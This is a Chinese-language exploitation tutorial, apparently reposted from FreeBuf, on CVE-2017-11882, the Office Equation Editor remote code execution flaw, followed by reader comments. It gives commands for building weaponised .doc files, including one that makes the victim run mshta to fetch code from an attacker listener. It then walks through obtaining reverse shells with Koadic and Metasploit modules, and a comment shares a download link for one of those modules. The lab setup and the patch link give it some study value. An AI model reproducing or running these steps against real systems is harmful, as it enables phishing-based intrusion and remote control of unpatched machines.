CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 漏洞列表
  3. 正文

CVE-2017-11882

2018年11月16日 915点热度 0人点赞 0条评论

FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
CVE-2017-11882漏洞复现和利用 ls_wen2017-11-27金币奖励+12共607582人围观 ,发现 24 个不明物体 新手科普漏洞
0×01前言
2017年11月14日微软发布了潜伏17年之久的office远程代码执行漏洞(cve-2017-11882)。该漏洞为office内存破坏漏洞,影响目前流行的office版本。

网上的利用方法比较乱,在这儿我将各种方法总结一下。顺便在这儿感谢乱舞大大以及他的团队,信安之路

0×02 漏洞复现
测试环境:win7+kali+office 2007 xp+kali+office 2003

win7 ip:10.10.1.144 xp ip: 10.10.1.126 kali ip 10.10.1.67

一. 简单测试弹出计算器(xp)
1.在kali下执行生成一个含有恶意代码的doc进行测试:

PythonCommand109b_CVE-2017-11882 -c “cmd.exe /c calc.exe” -o test.doc

这条指令的意思是调用cmd并执行calc.exe(即计算器)1.png

2.在靶机上打开就会弹出计算器:

2.png

二. 通过koadic漏洞复现(xp)
1.下载koadic并启用

https://github.com/backlion/koadic.git

2.执行./koadice

3.png

首先看一下koadic怎么用直接

4.png

3.接下来设置shell的接受地址以及端口

Set lhost 10.10.1.67

Set lport 55555

Run

5.png

这儿需要注意的是生成的网址需要记住,以方便后面应用

接下来通过poc生成一个含有恶意代码的doc文件

python Command109b_CVE-2017-11882.py -c “mshtahttp://10.10.1.67:55555/Ly348” -o exploit.doc

6.png

接下来在目标主机打开钓鱼文档

切回koadic则发现发生变化

7.png

这个时候说明入侵成功并已经反弹shell

接下来在koadic执行zombies 0 切换到项目

8.png

接下来用cmdshell模块

输入 cmdshell 0

10.png

这就已经进去cmd了接下来可以愉快的玩耍了

11.png12.png

三. 通过msf的ps_shell模块 漏洞复现(win7)
1.启动msf

13.png

2.查找对应的模块 search PS_shell

14.png

15.png

3.利用msf生成利用的powershell脚本

15.png

16.png17.png18.png19.png

提示一点 在这儿的Command109b_CVE-2017-11882是109字节限制的 当然也有43字节的

1.接接下来在靶机打开测试文档就好

2.切换回kali 会出现

20.png

说明已经建立链接了

接下来输入sessions -i 查看一下

21.png

接下来切换进入

22.png

这个时候就已经入侵到靶机了。

23.png

四. 通过hta_server模块复现(xin7)
1.在msf搜索hta_server模块

24.png

2.进行设置

25.png

26.png

27.png

3.在kali上生成带有恶意命令的doc

28.png

4.在靶机上打开test.doc文档 切换回kal

29.png

30.png

(之后的过程就和之前一样了,就不多啰嗦了)。
(ps:后两种是利用了powershell,所以在win7下测试的)

0×03漏洞影响
Office365
MicrosoftOffice 2000

MicrosoftOffice 2003

MicrosoftOffice 2007 Service Pack 3

MicrosoftOffice 2010 Service Pack 2

MicrosoftOffice 2013 Service Pack 1

MicrosoftOffice 2016

0×04漏洞修复建议
修复补丁:[https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882)
*本文作者:ls_wen,转载请注明来自FreeBuf.COM

ls_wen
1 篇文章
等级: 1级
||
上一篇:海莲花团伙利用MSBuild机制免杀样本分析下一篇:危机四伏的Office高危漏洞CVE-2017-11882
发表评论已有 24 条评论

exploit1996 (1级) 2017-11-27回复 1楼
doc的内容修改后就不能弹出计算器了有没有什么办法

亮了(4)

ls_wen (1级) 2017-11-27回复
@ exploit1996 这个可以参照漏洞原理先写入内容后再构建攻击文档

亮了(5)

1111 2017-11-27回复 2楼
这文章能给多少稿费?

进一步利用的又能给多少稿费?

亮了(0)

ls_wen (1级) 2017-11-27回复
@ 1111 不知道,没说

亮了(3)

炼石教育_曹博士 专栏作者(1级) 2017-11-27回复 3楼
6666

亮了(3)

feihuasimeng (1级) 一只小菜比 2017-11-27回复 4楼
大佬牛逼。大佬要跳槽不

亮了(5)

阿里巴巴 (1级) 2017-11-27回复 5楼
大佬还是我大佬,日常向大佬低头

亮了(1)

ouwensun (1级) 路虽远,行则必达。 2017-11-27回复 6楼
我来膜拜大佬,大佬求给个跪舔的机会 :razz: :razz:

亮了(0)

J’avo (1级) 2017-11-27回复 7楼
复制粘贴走点心???CSS代码都还在

亮了(1)

ls_wen (1级) 2017-11-27回复
@ J’avo 懒得写修复方式和补丁连接 :sad:

亮了(1)

360宇宙攻防实验室扛把子 2017-11-27回复 8楼
安装了我大安全卫视你来给我饶一个!

亮了(1)

ls_wen (1级) 2017-11-27回复
@ 360宇宙攻防实验室扛把子 卫视 :mrgreen:

亮了(0)

5895abce57413d7e70d6bd99 2017-11-28回复 9楼
拿个poc 万把个人装b

亮了(3)

HLW123 (1级) 2017-11-28回复 10楼
PS_shell模块咋添加的?我装了最新版kali还是没有PS_shell

亮了(1)

ls_wen (1级) 2017-11-28回复
@ HLW123 这个不是自带的模块,需要从网上下载下来然后导入

亮了(1)

HLW123 (1级) 2017-11-28回复
@ ls_wen 老铁,给个下载链接吧,网上找半天没找着

亮了(1)

ls_wen (1级) 2017-11-28回复
@ HLW123 链接:https://pan.baidu.com/s/1pKIwK4N 密码:pgae

亮了(1)

HLW123 (1级) 2017-11-28回复
@ ls_wen 谢了

亮了(1)

L 2017-11-28回复 11楼
为什么我的msf没有ps_shell模块

亮了(1)

ls_wen (1级) 2017-11-28回复
@ L 这个不是自带的,需要下载导入,上面的评论我给了分享链接

亮了(1)

FK_T (3级) 这家伙太懒了,他不想写个人描述! 2017-12-06回复 12楼
PythonCommand109b_CVE-2017-11882.py脚本能分享下吗

亮了(3)

sfsd 2017-12-12回复 13楼
wps有吗

亮了(1)

cdbping (1级) 2017-12-27回复 14楼
按照文章里的做法,不能弹出计算器啊(Office 2007 SP3)。求问怎么回事?

亮了(1)

mendickxiao (3级) script:alert(xss) 2018-03-20回复 15楼
学习了

亮了(0)
昵称
请输入昵称
必须您当前尚未登录。登陆?注册邮箱
请输入邮箱地址
必须(保密)表情插图
有人回复时邮件通知我

ls_wen

这家伙太懒,还未填写个人描述!

1
文章数
7
评论数
最近文章
CVE-2017-11882漏洞复现和利用
2017.11.27

浏览更多
相关阅读
恶意软件防卫指南(下):远离网络安全威胁,让电信诈骗分子见鬼去吧Zeus Panda Banker银行木马变种分析BTLE/BT4.0低功耗蓝牙无线发包器(可模拟iBeacon、建链、通信等)一个Linux平台的门罗币挖矿木马的查杀与分析详解OSSIM-OSSEC WIN 4771案例
特别推荐

关注我们 分享每日精选文章

活动预告
11月

FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气
已结束
10月

【16课时-连载中】挖掘CVE不是梦(系列课程2)
已结束
10月

【首节课仅需1元】挖掘CVE不是梦
已结束
9月

【已结束】自炼神兵之自动化批量刷SRC
已结束
FREEBUF免责声明协议条款关于我们加入我们广告及服务寻求报道广告合作联系我们友情链接关注我们
官方微信
新浪微博腾讯微博Twitter赞助商
Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号
css.php0daybank

标签: 暂无
最后更新:2018年11月16日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me